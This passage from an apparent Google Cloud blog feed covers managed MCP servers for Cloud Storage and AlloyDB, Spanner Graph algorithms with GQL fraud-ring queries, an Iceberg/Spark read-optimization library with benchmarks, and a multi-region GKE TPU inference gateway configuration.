MCP has rapidly emerged as the universal standard for connecting agents to data sources, but building custom servers from scratch is often a slow, distracting process that diverts focus from innovation. This path introduces significant development overhead and risk, as it forces you to manage everything from authentication and error handling to keeping pace with GCS’s evolving capabilities. To solve this, GCS offers two powerful MCP server options — Remote and Local — allowing you to offload the foundational plumbing and focus on creating value.

1. Remote MCP server: Fully-managed
Connecting your agents to the Cloud Storage MCP server requires zero infrastructure deployment. By simply pointing your agent configuration to the managed endpoint, you gain immediate access to your unstructured data on GCS, allowing you to scale your agentic workloads effortlessly without the burden of operational overhead.

Because the Cloud Storage MCP server follows the open MCP standard, it works seamlessly with major agentic frameworks like ADK and is compatible with MCP clients. You can easily connect clients like Google Antigravity and Anthropic’s Claude by adding a Custom Connector in the settings. Simply point it to your Cloud Storage MCP endpoint, and you are ready to start building — no complex configuration files required.

Connecting an agent to storage requires robust security and governance. GCS MCP server is built on Google Cloud's standard identity, observability, and security frameworks:

Identity-first security: Authentication is handled entirely through Identity and Access Management (IAM) rather than shared keys. This ensures agents can only access data (buckets and objects) explicitly authorized by the user.
Full observability: To track agent activity, every request and action taken via these MCP servers is logged in Cloud Audit Logs. This provides security teams with a record of every interaction, maintaining visibility alongside ease of access.
MCP security - content scanning: You can optionally configure the MCP endpoint with Google’s content security service, Google Cloud Model Armor. This allows you to implement security controls against common MCP attack vectors—such as direct and indirect prompt injection attacks, MCP Tool poisoning attacks, and malicious URL/SQL injections—as well as prevent the leakage of sensitive data.

Cloud Storage MCP servers are perfect for most production use cases; however, as with all remote servers, you lose the capability to fully customize your MCP tools.

2. Local MCP Server: Self-managed for controlled customization
While the Remote server handles standard data access, Local MCP is the right choice when you need to build custom tools specific to your business logic. For example, if your agent needs to perform specialized data transformations—such as redacting PII or adding context from another internal system—whenever it reads a file from GCS, a Local MCP server allows you to define those unique capabilities

The GCS Local MCP server is an open-source GitHub repository of Google-maintained tools that provides you with a reliable bridge to your data. Here are a few tips to keep in mind while designing custom tools:

Provide precise, clear descriptions to minimize incorrect invocations by the models
Implement model-friendly error handling for models to understand their mistakes and self-correct

The GCS Local MCP is now also a part of the MCP Toolbox for Databases, a single open-source repository containing connectors for major data services such as GCS, BigQuery, AlloyDB, Spanner, and Cloud SQL, making it easier to monitor and manage your data ecosystem. The Toolbox offers simplified development with reduced boilerplate code, enhanced security through OAuth2 and OIDC, and end-to-end observability with OpenTelemetry integration.

Get started

Whether you are optimizing an existing process like Snap or automating workflow creations like Airwallex, your unstructured data is one of your agent's greatest assets.

Explore the generally available GCS Remote MCP Server.
Check out our GCS Local MCP GitHub repository to start building custom tools today, or use it as part of MCP Toolbox for Databases.
Reach out to us to discuss your Agent use case with GCS data.

Announcing Spanner Graph algorithms: Google-grade intelligence for connected data

Tue, 02 Jun 2026 16:00:00 +0000

At Google Cloud Next, we announced the preview of graph algorithms with Spanner Graph, bringing Google Research’s state-of-the-art graph mining capabilities natively to your database. These graph intelligence capabilities can help you derive valuable insights from graph data faster, cheaper, and at scale.

Enterprises are increasingly leveraging graph technologies to uncover complex relationships in data for use cases such as fraud detection, social network analysis, entity resolution, and healthcare research. Graph algorithms, such as node centrality and community detection, are the computational methods used to analyze these structures, and work by quantifying the patterns and strength of connections between entities. However, running graph algorithms at scale has historically been challenging and resource-intensive, often requiring complex ETL pipelines to dedicated analytic solutions or risking the transactional performance of the graph database.

We designed Spanner Graph algorithms to tackle demanding enterprise workloads without compromising on the performance of your operational database. This architecture provides several distinct advantages:

Tight integration with GQL: Directly invoke algorithms using ISO Graph Query Language (GQL) to run structural analytics across your data. By sequentially weaving algorithms and standard queries together, Spanner Graph minimizes complex data movement to external engines, simplifying your architecture and accelerating time-to-insight.
Near-zero transactional impact and lower TCO: Algorithm execution happens on dedicated compute resources, so as not to impact live production traffic. Spanner automatically provisions resources and securely routes data via Data Boost without having to create a custom ETL pipeline. Pay only for what you use, avoiding expensive licensing and operational overhead of legacy solutions.
Global insights on billion-edge graphs in minutes: Built for scale and speed, our engine can run algorithms on graphs with tens of billions of edges within minutes. Encoding topologies in a dense format that’s optimized for random access enables high-performance structural analytics on massive datasets.

While Google Research has published several research papers, held workshops, and released open-source projects based on its graph mining tools (e.g., for multi-core clustering), this is the first time that they are widely available to Google Cloud customers. Let’s take a deeper look at graph algorithms, and how you can use them with Spanner Graph.

Algorithms: Deeper insights for connected data

When we first launched Spanner Graph, our goal was to reimagine graph data management with a native graph database experience within Spanner, Google’s highly scalable, distributed database. Spanner Graph unifies relational and graph models, allowing developers to query connected data using the ISO GQL, while also interoperating with Spanner's existing tabular, search, and vector capabilities. This allows you to build intelligent applications without creating complex data pipelines, duplicating data, or increasing security and governance risk.

Building on this foundation, Spanner Graph algorithms help you to extract even deeper insights from your connected data. Graph algorithms analyze the relationships and connections within data, revealing hidden patterns and insights that might be missed with traditional analytical methods. With this launch, you can analyze connectedness to, for example, detect fraud rings, conduct clustering for entity resolution, identify points of failure in complex networks, or recommend products based on the preferences of connected users.

We use graphs extensively at Google. In fact, many popular algorithms like PageRank, the foundational technology that powers Google Search, were invented here. With native algorithm support in Spanner Graph, we are bringing some of Google’s leading graph intelligence capabilities directly to Google Cloud customers, with a set of essential graph algorithms that help you easily uncover the hidden structures within your data:

Centrality: Pinpoint the most influential and central nodes within your network using betweenness centrality, closeness centrality, and PageRank.
Community detection: Automatically group highly connected entities to uncover hidden segments with label propagation, correlation clustering, modularity clustering, weakly connected components, and clique aggregator.
Similarity and path finding: Find optimal routes using set-to-set shortest paths, or measure node similarities using Jaccard, cosine, common neighbors, and total neighbors.

An integrated developer experience

You can invoke graph algorithms directly using GQL on the entire graph, subgraphs, or a select set of nodes and edges. Spanner offers an integrated workflow: results from graph algorithm runs can be written directly back to Spanner Graph. This lets you invoke algorithms and standard queries sequentially, using the output of one operation as input to the next. Additionally, you can also store results in Cloud Storage buckets.

Example: Uncovering the ringleader of a fraudulent network

Consider a scenario where you are analyzing financial transactions to combat money laundering. Fraudsters usually manipulate a set of “mule” accounts (intermediary accounts for money laundering) that interact with one another to collectively commit fraud. To capture the teamwork between detected and hidden mule accounts, anti-fraud experts usually resort to link analysis and community detection graph algorithms. Here’s how you can use algorithms and queries together in Spanner Graph to catch them.

Step 1: Identify communities of accounts (algorithm)
First, we apply a modularity clustering algorithm to cluster accounts into communities. We then write the resulting community_id directly back to the Account in Spanner Graph.

code_block: <ListValue: [StructValue([('code', "-- Runs community detection and update results to the graph\r\nEXPORT DATA OPTIONS(\r\n format ='CLOUD_SPANNER',\r\n table = 'Account',\r\n write_mode = 'update_ignore_all'\r\n) AS\r\nGRAPH FinGraph\r\nCALL ModularityClustering(\r\n node_labels => ['Account'],\r\n edge_labels => ['Transfer']\r\n)\r\nYIELD node, cluster\r\nRETURN node.id, cluster AS community_id;"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9411bab20>)])]>

Step 2: Pinpoint the suspicious community (query)
Now that every account belongs to a community, we can use a GQL query to perform analytical queries on each community to uncover anomalous behaviors. For example, we can check the total number of known fraud accounts within each community.

code_block: <ListValue: [StructValue([('code', '-- Finds the community with the highest concentration of flagged fraud\r\nGRAPH FinGraph\r\nMATCH (a:Account)\r\nWHERE a.community_id IS NOT NULL\r\n AND a.fraud_flag = TRUE\r\nRETURN a.community_id AS community_id, COUNT(*) AS fraud_count\r\nORDER BY fraud_count DESC;'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9411bac10>)])]>

Step 3: Calculate influence to find the "ringleader" (algorithm on a subgraph)
Let's assume the query above reveals that Community 2 has seen a massive spike in fraudulent activity. In this step, we filter the graph to isolate only the accounts in that specific community and run the PageRank algorithm to find the central ringleader within that exact group.

code_block: <ListValue: [StructValue([('code', "EXPORT DATA OPTIONS(\r\n format = 'CLOUD_SPANNER',\r\n table = 'Account',\r\n write_mode = 'update_ignore_all' \r\n) AS\r\n-- Specifies a suspicious subgraph\r\nGRAPH FinGraph\r\nMATCH (n:Account {community_id: 2})\r\nRETURN n\r\nFULL UNION ALL\r\nMATCH -[e:Transfer]->\r\nRETURN e\r\nNEXT\r\n-- Runs PageRank \r\nCALL PER() PageRank(max_iterations => 20) \r\nYIELD node, score\r\nRETURN node.id, score AS pagerank_score;"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9411bad90>)])]>

Step 4: Investigate the target (query)
Now that the accounts in Community 2 have a pagerank_score, we can write a query that isolates the most central account and that immediately traces where that specific ringleader moved their funds recently.

code_block: <ListValue: [StructValue([('code', "-- Finds the top scorer (ringleader) and trace their money\r\nGRAPH FinGraph\r\nMATCH (ringleader:Account {community_id: 2})\r\nORDER BY ringleader.pagerank_score DESC\r\nLIMIT 1\r\nWITH ringleader\r\nMATCH (ringleader)-[e:Transfer]->{1, 5}(receiver:Account)\r\nWHERE e.ts > '2025-12-01'\r\nRETURN ringleader.id AS ringleader_id, receiver.id AS receiver_id, e.amount, e.ts;"), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9411baa60>)])]>

By allowing you to weave high-performance algorithms with standard GQL queries, Spanner Graph eliminates the need to move data back and forth between operational databases and external analytics engines. This unified approach dramatically simplifies your data architecture and accelerates your time to insight.

Trusted by industry leaders

Customers like DaVita, Yahoo!, SoundCloud, and WPP are already leveraging Spanner Graph algorithms to solve some of their most complex data challenges.

"Leveraging Spanner Graph for our Patient 360 initiative has allowed us to consolidate complex healthcare data into a single, unified view. The addition of native graph algorithms like community detection and centrality is a major step forward, enabling us to uncover deep insights within our patient networks faster and at scale. These fully managed capabilities allow our team to focus on driving innovation in patient care without the operational burden of managing complex data pipelines." - Sam Ghosh, Chief Enterprise Architect at DaVita Kidney Care

"Operating at global scale across Yahoo’s iconic consumer properties requires us to unify billions of user profiles into a single, real-time view. With Spanner Graph, we’ve modeled our Unified User Profile (UUP) as a graph, bringing together previously distributed systems into a centralized source of truth. The addition of fully managed graph algorithms on Spanner further accelerates our ability to deliver personalization at scale. By leveraging algorithms such as community detection and PageRank, we can drive deeper audience segmentation and power more relevant, engaging user experiences across our platform." - Chris James, Director of Engineering, Yahoo

"With 500+ million tracks from 40+ million artists across 190+ countries, SoundCloud is where emerging artists find their sound, hidden gems are discovered, and music culture is shaped in real time. We have been running graph algorithms in batch mode for years, with processes often taking multiple hours on custom clusters to analyze our massive, multi-billion-edge music graph. The launch of Spanner Graph algorithms is a true game-changer: It not only provides the massive scalability we need, but also allows us to move away from complex custom Python workflows to a fully managed service. Most importantly, it unlocks the ability to run graph algorithms on our most up-to-date data for use cases like identifying creator hubs and improving recommendations, without requiring complex ETL pipelines or impacting the low-latency transactional workloads running on Spanner today." - Sergey Chekanskiy, VP of Engineering - Data Foundation, SoundCloud

“We've been eager to leverage advanced graph algorithms for Open Intelligence, our foundational intelligence layer that securely connects trillions of live data points from clients, partners and WPP in a privacy-first way and that is now integrated and powers WPP’s agentic marketing platform, WPP Open. In order to have instant, exploratory access to complex relationships across billions of entities – driving planning, modelling, and experimentation — we need native support for deep graph traversal, structural pattern recognition, and advanced algorithms. Algorithm support on Spanner Graph provides the performance and scalability to tackle our most challenging graph analytics problems without operational overhead or expensive licensing." - Rob Marshall, Head of Strategy, Data & Intelligence, WPP

Build more intelligent applications

Now with native support for algorithms in Spanner Graph you can move beyond basic relationship traversals and run deep structural analytics directly on your freshest transaction data. By applying these classic graph algorithms at scale, you can unlock new capabilities for your enterprise applications:

Proactive fraud detection and anti-money laundering: Expose coordinated fraud rings by automatically grouping connected mule accounts with Community Detection (like modularity clustering), then apply centrality (like PageRank) to pinpoint the ringleader who controls the illegal fund flow.
Customer 360 and entity resolution: Unify fragmented, cross-channel data into a single canonical profile using similarity functions like Jaccard and community detection like label propagation. These profiles can be further enriched for downstream ML training by generating topological features, such as PageRank, for each node.
Autonomous network operations and digital twins: Model your IT or telecom infrastructure as a digital twin, using similarity and path finding (like set-to-set shortest path) to proactively identify critical vulnerabilities and predict cascading failures.
Hyper-personalized product recommendations: Move beyond basic purchase histories by analyzing broader user behaviors. Use similarity algorithms (like common neighbors) to find overlapping preferences between entities, and centrality (like personalized PageRank) to surface the most relevant recommendations for those peer groups.
Resilient supply chain and logistics: Protect your supply chain from hidden bottlenecks using centrality (like betweenness centrality) to pinpoint over-relied-upon distribution hubs, and path finding to instantly calculate efficient alternative routes during disruptions.
Cybersecurity threat hunting and blast-radius analysis: Accelerate threat hunting by applying community detection (like correlation clustering) to isolate anomalous machine communications, and path finding to trace the attacker's exact lateral movement and blast radius.
Predictive customer churn analysis: Stop contagious customer churn by mapping out tight-knit subscriber groups with community detection, then apply centrality to identify and target core influencers with retention promotions before the churn spreads.

Get started today

Spanner Graph algorithms are supported with the Enterprise and Enterprise+ editions of Spanner. To learn more, view the documentation or try out this codelab. You can also watch this video for a summary of graph algorithm support with Spanner Graph.

Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core

Tue, 02 Jun 2026 16:00:00 +0000

Many data engineers spend significant time managing compatibility and getting best performance across multiple analytics engines. To help solve this pain point, we are excited to announce gcs-analytics-core, a new open-source Java library designed to centralize and accelerate analytics optimizations for Google Cloud Storage (GCS).

With this, you get the flexibility to select your preferred analytics engine while achieving high performance on GCS. The gcs-analytics-core library provides optimizations across various analytics engines that you use today on GCS, like the Iceberg Spark engine and plan to expand to other analytics engines by the end of this year.

Built to be shared across major data processing frameworks like Apache Spark, this library consolidates and improves performance for analytics workloads on GCS. Available natively in the Apache Iceberg Java runtime starting from version 1.11.0, this library improves read operations for columnar formats like Parquet.

What is the gcs-analytics-core library?

The gcs-analytics-core library is a centralized optimization layer that sits between your analytics engines — such as Apache Spark, Trino, and Apache Hive — and the underlying GCS Java SDK. It intercepts read calls and injects performance enhancements, providing a consistent experience without requiring framework-specific tuning.

For Apache Iceberg users, it integrates into the GCSFileIO implementation, replacing traditional sequential reads with parallelized strategies to minimize latency and maximize throughput.

Key technical optimizations

The library introduces specific optimizations designed to reduce time spent on I/O and end-to-end execution time:

Vectored I/O (threaded): This feature improves read performance by fetching multiple data ranges in parallel within a single operation, reducing the overhead of GCS calls. Without this feature, the system needs to issue a separate call for each data range, increasing both the number of operations and open file latency for each request.
Smart Parquet prefetching: When reading Parquet data, analytics engines typically perform an initial read of the file’s footer, which contains the data structure and information about where specific data ranges are located. The library automatically prefetches this footer data in a single chunk (typically 50KB–100KB), avoiding the multiple network calls that often occur when engines repeatedly seek backward to fetch metadata..

Spotlight: Apache Iceberg integration

We delivered the first major integration of this library into Apache Iceberg. With Iceberg 1.11.0 or later, analytics engines utilizing Iceberg’s GCSFileIO can leverage these performance enhancements. To adopt the library in your environment, verify your Iceberg catalog is configured to use the native GCS FileIO:

code_block: <ListValue: [StructValue([('code', '# Spark configuration example\r\nspark.sql.catalog.my_catalog.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa94204dbe0>)])]>

Because the core optimizations are embedded within the updated Iceberg runtime and the GCS connector architecture, you automatically benefit from Parquet footer prefetching and multi-threaded vectored reads — with no complex custom tuning required.

You can follow the specific integration details in Apache Iceberg Issue #14326.

Catalog compatibility

The gcs-analytics-core library is compatible with all Iceberg catalogs including the REST catalog, Hive, and other metadata management systems. By decoupling the performance optimizations from the catalog management layer, the library provides consistent read improvements without requiring adjustments to your existing infrastructure setup so you can scale across diverse data lake architectures.

TPC-DS Performance Benchmarks using Spark

To validate these improvements, end-to-end benchmarking was performed using an open source Apache Spark cluster with an Iceberg catalog configured to use GCSFileIO along with the gcs-analytics-core library.

The benchmark leveraged the industry-standard TPC-DS schema across varying dataset sizes (from 1GB up to 10TB), specifically comparing the new library's optimizations against the default GCSFileIO implementation, which uses sequential vectored reads.

By alleviating the I/O bottleneck at the storage layer, compute engines spend less time waiting for network responses (scan time) and more time processing data (execution time).

Here are the end-to-end TPC-DS benchmark results showcasing the percentage improvement when enabling gcs-analytics-core:

TPC-DS schema size	Scan time improvement	Execution time improvement
1 GB	71.51%	32.61%
10 GB	48.48%	18.94%
100 GB	40.98%	10.95%
1 TB	35.86%	3.38%
10 TB	18.40%	1.58%

As the data shows, there is a consistent improvement across all dataset sizes. The library is effective for the complex query patterns in TPC-DS, delivering scan time reductions that directly lower overall query execution time.

Get started

Before running your Spark workloads, confirm that the following requirements and configurations are met:

Use Apache Iceberg Spark runtime 1.11.0+ and the iceberg-gcp-bundle 1.11.0+.
Configure your catalog to use GCSFileIO.
Enable the gcs-analytics-core optimization flag (spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true).
Enable vectorized I/O (spark.sql.iceberg.vectorization.enabled=true) to achieve read performance.

code_block: <ListValue: [StructValue([('code', 'spark-submit \\\r\n --packages org.apache.iceberg:iceberg-spark-runtime-3.5_2.12:1.11.0,org.apache.iceberg:iceberg-gcp-bundle:1.11.0 \\\r\n --conf spark.sql.catalog.$CATALOG_NAME=org.apache.iceberg.spark.SparkCatalog \\\r\n --conf spark.sql.catalog.$CATALOG_NAME.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO \\\r\n --conf spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true \\\r\n --conf spark.sql.iceberg.vectorization.enabled=true \\\r\n <your-application-jar-or-script>'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa94204db50>)])]>

The gcs-analytics-core library is open source and available for developers to contribute to the project and explore the source code. Our implementation and micro-benchmark configurations are part of the repository and can be referenced for your contributions or validations.

GitHub repository: GoogleCloudPlatform/gcs-analytics-core
Documentation: Review the design document for deep architectural details.

We want to hear about your experience. If you test this on your own datasets, please feel free to open an issue on GitHub or share your results with the community. We look forward to seeing how you utilize these optimizations in your data lakes.

Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway

Tue, 02 Jun 2026 07:00:00 +0000

What happens when your workload fails in one region but you need access to service? This is a common case for availability and uptime. With recent enhancement to the Kubernetes ecosystem and capabilities like Dynamic Resource Allocation (DRA) and Inference Gateway. I decided to experiment with these capabilities in Google Cloud for a simple test using an AI inference workload.

In this blog, we will explore this setup and you can also jump straight into the detailed configs in this codelab Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET.

Building blocks

To build out this experiment, use the following products, features, and tools:

Google Kubernetes Engine (GKE) managed DRANET: This is a managed feature that lets you request and share resources among Pods. This supports GPUs, and TPUs. In this test TPUs were used in two different regions with networking assigned using managed DRANET.
Multi-cluster GKE Inference gateway: Load balances your AI/ML inference workloads across multiple GKE clusters. This works in a failover situation which is what my experiment intended to test. The type which supports this is the Multi-cluster Cross-region internal Application Load Balancer gke-l7-cross-regional-internal-managed-mc
Cloud Storage FUSE: Provides a way to store data, models, checkpoints, and logs directly in Cloud Storage. To speed up the deployment, an open source gemma model was downloaded to this storage for retrieval.
Virtual private Cloud (VPC): The foundational global network providing isolated, secure communication for the internal load balancers and compute nodes
GKE Fleets: Fleets group the separate regional clusters under a unified management control plane
TPU v6e: Google's custom AI accelerators that provide the high-performance compute required to serve the model. The VM family type used was the ct6e-standard-4t in a 2x2 Slice

Design pattern example

The aim is to deploy a LLM model (Gemma 3) onto 2 GKE clusters in different regions. Each cluster will use 4 TPU v6e chips. The model should be stored in Cloud Storage. The workload is served using GKE Inference Gateway which supports multi-clusters. The traffic should be routed to the region closest to the user and failover to the other region if one region fails.

Putting it together

To get access to the TPUs for your project in two regions you have to ensure you have the necessary quota in those regions.

Begin: Set up the environment.

Create a standard VPC, with firewall rules and subnet in the same zone as the reservation.
Create a proxy-only subnet this will be used with the Internal regional application load balancer attached to the GKE inference gateway
Set up firewall rules allowing traffic and health checks.
Reserve static internal IP addresses in both regions for the Gateway.
Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.

Next: Create standard GKE clusters and node pools.

Deploy two separate GKE clusters in your chosen regions configured.
Enable the Gateway API (--gateway-api=standard) and the Cloud Storage FUSE CSI driver (--addons GcsFuseCsiDriver) during cluster creation.
Create dedicated TPU v6e node pools (ct6e-standard-4t) for both clusters.
Enable managed DRANET on these TPU node pools by setting the flags ---accelerator-network-profile=auto, and --node-labels=cloud.google.com/gke-networking-dra-driver=true

Next: Establish the global mesh via Fleet Registration.

Register both GKE clusters to a unified GKE Fleet by following the fleet creation and registration setup.
Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.
Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.

Next: Deploy the AI workload.

Use a temporary Kubernetes job to download the Gemma 3 (gemma-3-27b-it) model weights directly into your Cloud Storage bucket.
Define a ResourceClaimTemplate that explicitly requests the managed DRANET device class (deviceClassName: netdev.google.com ) with the allocation mode set to "All".

code_block: <ListValue: [StructValue([('code', 'apiVersion: resource.k8s.io/v1\r\nkind: ResourceClaimTemplate\r\nmetadata:\r\n name: all-netdev\r\n namespace: default\r\nspec:\r\n spec:\r\n devices:\r\n requests:\r\n - name: req-netdev\r\n exactly:\r\n deviceClassName: netdev.google.com\r\n allocationMode: All'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9401fea30>)])]>

Deploy your inference server (e.g. vLLM) on the TPU nodes in both regions. Ensure the pod spec utilizes node selectors for the 2x2 TPU topology, requests exactly 4 TPUs, and mounts the netdev claim. This guarantees your pods utilize the dedicated accelerator networking alongside standard Ethernet.

Next: Configure the Multi-Cluster Inference Gateway.

Install the necessary Custom Resource Definitions (CRDs) so Kubernetes can process specialized routing objects like the InferenceObjective.
Deploy an AutoscalingMetric to track hardware utilization, such as KV cache usage.
Use Helm to group the independent AI deployments from both regions into a single, logical InferencePool.
Deploy the Cross-Region Gateway and its associated HTTPRoute to manage incoming global traffic.
Apply health checks and backend policies to the pool to ensure load balancing relies on your custom hardware metrics.

Configure an InferenceObjective to instruct the gateway to route prompts to the region with the highest availability, avoiding overloaded TPUs.

code_block: <ListValue: [StructValue([('code', 'apiVersion: gateway.networking.k8s.io/v1\r\nkind: Gateway\r\nmetadata:\r\n name: cross-region-gateway\r\n namespace: default\r\nspec:\r\n gatewayClassName: gke-l7-cross-regional-internal-managed-mc\r\n addresses:\r\n - type: networking.gke.io/named-address-with-region\r\n value: "regions/europe-west4/addresses/gemma-gateway-ip-europe-west4"\r\n - type: networking.gke.io/named-address-with-region\r\n value: "regions/us-east5/addresses/gemma-gateway-ip-us-east5"\r\n listeners:\r\n - name: http\r\n protocol: HTTP\r\n port: 80\r\n---\r\napiVersion: gateway.networking.k8s.io/v1\r\nkind: HTTPRoute\r\nmetadata:\r\n name: gemma-route\r\n namespace: default\r\nspec:\r\n parentRefs:\r\n - name: cross-region-gateway\r\n kind: Gateway\r\n rules:\r\n - backendRefs:\r\n - group: networking.gke.io\r\n kind: GCPInferencePoolImport\r\n name: gemma-pool\r\n port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: HealthCheckPolicy\r\nmetadata:\r\n name: gemma-health-check\r\n namespace: default\r\nspec:\r\n targetRef:\r\n group: networking.gke.io\r\n kind: GCPInferencePoolImport\r\n name: gemma-pool\r\n default:\r\n config:\r\n type: HTTP\r\n httpHealthCheck:\r\n requestPath: /health\r\n port: 8000\r\n---\r\napiVersion: networking.gke.io/v1\r\nkind: GCPBackendPolicy\r\nmetadata:\r\n name: gemma-backend-policy\r\n namespace: default\r\nspec:\r\n targetRef:\r\n group: networking.gke.io\r\n kind: GCPInferencePoolImport\r\n name: gemma-pool\r\n default:\r\n timeoutSec: 100\r\n balancingMode: CUSTOM_METRICS\r\n trafficDuration: LONG\r\n customMetrics:\r\n - name: gke.named_metrics.tpu-cache\r\n dryRun: false\r\n maxUtilizationPercent: 60\r\n---\r\napiVersion: autoscaling.gke.io/v1beta1\r\nkind: AutoscalingMetric\r\nmetadata:\r\n name: tpu-cache\r\n namespace: default\r\nspec:\r\n selector:\r\n matchLabels:\r\n app: gemma-server\r\n endpoints:\r\n - port: 8000\r\n path: /metrics\r\n metrics:\r\n - name: vllm:kv_cache_usage_perc\r\n exportName: tpu-cache\r\n---\r\napiVersion: inference.networking.x-k8s.io/v1alpha2\r\nkind: InferenceObjective\r\nmetadata:\r\n name: gemma-objective\r\n namespace: default\r\nspec:\r\n priority: 10\r\n poolRef:\r\n name: gemma-pool\r\n group: "inference.networking.k8s.io"'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fa9401fefd0>)])]>

Testing the Failover

Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.

Next Steps

Take a deeper dive into a hands-on codelab and more information on these features review the following.

Hands-on Codelab: Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET
Document set: DRANET
Documentation: AI Hypercomputer

Want to ask a question, find out more or share a thought? Please connect with me on Linkedin.

The fully-managed Remote MCP Server for AlloyDB is now Generally Available

Mon, 01 Jun 2026 16:00:00 +0000

AI agents possess incredible reasoning capabilities and can perform increasingly complex actions. But the reliability of agentic outcomes depends entirely on the quality of the context they can access — context that is frequently locked away in operational databases.

To bridge this gap, we are excited to announce the Remote Model Context Protocol (MCP) Server for AlloyDB is now generally available.

The Model Context Protocol (MCP) is an open-source standard that gives LLMs a secure, consistent way to connect to external data sources. As part of Google Cloud’s recent rollout of 50+ Google-managed MCP servers, this new integration makes it easier than ever for both interactive and autonomous agents to securely harness the full power of your enterprise data. For example, you can now ask an AI agent for an up-to-the-millisecond view of your delivery fleet by connecting it to your real-time logistics data in AlloyDB, avoiding inaccuracies due to stale data and reducing the need for manual reporting.

Why AlloyDB is the strong foundation for agentic apps

By connecting MCP to AlloyDB, your agents get access to the premier database built for enterprise-grade AI. AlloyDB delivers the scale, speed, and intelligence required for the most demanding agentic workloads:

Supercharged vector performance: Scale to over 10 billion vectors at up to 6x the speed of standard PostgreSQL for vector queries (and up to 10x faster for filtered queries) with the ScaNN index.
Advanced search and reranking: Power multimodal applications with hybrid search via RUM (in Preview) and intelligent reranking through Reciprocal Rank Fusion (RRF) or Gemini Enterprise Platform models.
Real-time intelligence: Efficiently generate millions of embeddings using built-in AI Functions to facilitate low-latency, real-time agentic experiences.
Unified data access: Give agents a single PostgreSQL interface to seamlessly join operational data in AlloyDB with analytical data in BigQuery or archived data in Iceberg tables via Lakehouse Federation.
Enterprise-grade scale: Rest easy with a 99.99% SLA, autopilot database optimizations, and auto-scaling read pools with up to 20 nodes.

Why Remote MCP matters for AlloyDB

Local MCP servers are great for local development, but communicating over standard input/output (stdio) streams becomes difficult when you scale to production workloads. It is both architecturally complex and administratively burdensome to provision and manage all of the infrastructure and security guardrails you need to run agents for high-value use cases that interact with sensitive operational data.

The Remote MCP Server for AlloyDB runs on fully-managed Google Cloud infrastructure and exposes an HTTP endpoint that connects your AI applications to your data. This solves key challenges for teams building agents on PostgreSQL:

Centralized discovery: Find, secure, and manage your database's MCP server using Agent Registry.
Fully-managed HTTP endpoints: No need to deploy or maintain the infrastructure required for connectivity. Configure your agent to use the endpoint to get started.
Fine-grained authorization: Instead of using shared database passwords or API keys, you use Identity and Access Management (IAM) to restrict agents to specific tables, schemas, or views. With the read-only execute SQL tool, you can prevent your agent from making accidental changes and deletions from your database.
Operational instance management: The AlloyDB toolset gives agents the ability to do more than run queries. Agents can update instances, export and import data, create backups, and restore clusters.
Model Armor protection: Model Armor provides optional prompt and response security to screen and filter data, defending against prompt injections or accidental data exfiltration.
Audit logging: Every query, action, and tool call goes to Cloud Audit Logs, giving security teams a full audit trail.

Let's see it in action: A quick demo

Getting started with the AlloyDB Remote MCP server is a straightforward process. To see it in action in your own environment, you can follow our new Codelab, which guides you through these essential steps:

API & environment prep: Enable the AlloyDB, Compute Engine, and Gemini Enterprise APIs in your Google Cloud project.
Provision your database: Deploy your AlloyDB cluster, create your database, and import your sample data.
Enable data access API: Permit the Data Access API on your AlloyDB instance.
Connect the agent: Configure your MCP client by providing the remote endpoint (https://alloydb.googleapis.com/mcp). Pass your Google Cloud IAM credentials using an OAuth 2.0 bearer token in the HTTP Authorization header.

Once the connection is established, your agent can provide reliable, grounded answers to complex business questions using your real-time operational data. By performing introspection queries, the agent automatically understands your database schema – including tables and columns – enabling it to construct sophisticated joins and queries to fulfill user requests accurately.

Once your agent has access to the AlloyDB toolset, it can execute queries, analyze operational trends, and dynamically rank text data using AlloyDB AI functions like AI.RANK().

Security remains paramount: the Remote MCP Server for AlloyDB integrates seamlessly with Model Armor. This provides protection against sensitive data leaks, even if the agent’s service account possesses broad access permissions within the database.

Watch the full demo below!

What's next

By enabling agents to interact securely with transactional data, we are embracing an architecture where AI agents can reliably access and act upon your enterprise’s single source of truth.

Ready to build? Discover AlloyDB with a 30-day free trial, and dive into the Remote MCP for AlloyDB Codelab to start powering your enterprise agentic applications today.

Modeling a digital twin of a food supply chain using BigQuery Graph

Mon, 01 Jun 2026 16:00:00 +0000

The example of a growing restaurant

Imagine you are running a restaurant chain. You just can't physically feel and touch things to know how your business operates. You need tools and a digital replica of your business to sense the health of the business for you.

The friction of growth

Growth creates a unique kind of friction that spreadsheets simply weren't built to solve:

The bullwhip effect: Small downstream demand shifts swell into upstream inventory tidal waves.
SOP drift: Tiny departures from standard prep work eventually erode the entire brand vibe.
The food safety blast radius: One contaminated ingredient creates a messy, complex map of risk across the network.
Maverick spend: The "million-dollar leak" caused by local managers purchasing ingredients off-contract.

The digital twin

Digital models empower us to ask more insightful questions about the world, but they also force a critical choice in how we structure data. While traditional relational tables have been the standard, we must ask: are they still the right tool for everything? Given that our world is inherently interconnected, perhaps shifting to graph-based models is the natural evolution for capturing reality.

